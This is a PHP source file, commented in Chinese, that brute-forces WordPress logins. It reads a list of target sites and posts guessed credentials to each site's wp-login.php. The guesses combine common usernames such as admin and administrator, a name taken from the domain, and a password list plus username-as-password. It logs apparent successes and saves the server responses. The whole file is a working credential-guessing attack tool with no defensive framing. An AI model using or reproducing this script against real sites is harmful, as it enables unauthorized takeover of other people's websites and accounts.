<?php 
//exit("Ready?");
include_once 'function/Include.php';

function wp_go($v){
	$ok_conut = 0;
	
	$url = "http://{$v}/wp-login.php";
	$user_name = "admin,member,master,username,test,www,administrator";
	$user_name.= ",".domain_name_get_user_name($v);;
	$params = "log=[USER_NAME]&pwd=[PASSWORD]&rememberme=forever&wp-submit=Log In&redirect_to=http://{$v}/wp-admin/&testcookie=1";
	
	write_log("url:$url");
	write_log("params:$params");
	
	$users = explode(",", $user_name);//将用户名以","号分开
	foreach ($users as $user) {//循环用户名
		$user = trim($user);
		
		$passwords = include 'function/password.php';//取得密码,每次都加裁载一次,因为下面会改变它的值
		//测试用户名就是密码
		$passwords[] = $user;
		$passwords = array_unique($passwords);
		
		foreach ($passwords as $pwd) {//循环密码
			if(empty($pwd))
				continue;
			
			//每次请求的用户名和密码都不同,所以在请求前要替换
			$post_params = str_replace("[USER_NAME]", $user, $params);
			$post_params = str_replace("[PASSWORD]", $pwd, $post_params);
			$return_str = curl($url,$post_params);
			if(strpos($return_str, "Invalid username") !== false || strpos($return_str, "无效用户名") !== false){
				write_log("用户错:$user,url:$url");
				break;
			}
			if(strpos($return_str, "Not Found") !== false)
				return;
				
			if(empty($return_str)){
				write_log_ok("url:$url ,user:$user,pwd:$pwd");
				$ok_conut++;
				
				if($ok_conut>=2){
					$ok_conut = 0;
					break;
				}
			}
			
			//下面是保存返回的结果
			$result = "url:".$url."\r\n".json_encode($post_params)."\r\n\r\n".$return_str;
			$file_name = "data/".time_auto(8,true).".html";
			saveFile($result, $file_name);
		}
		
	}
}

$wp_site = include 'function/wordpress_site.php';//取得Wordpress站点
$wp_site = array_unique($wp_site);
foreach ($wp_site as $value) {
//	echo $value."\r\n";
	wp_go($value);
	exit;
}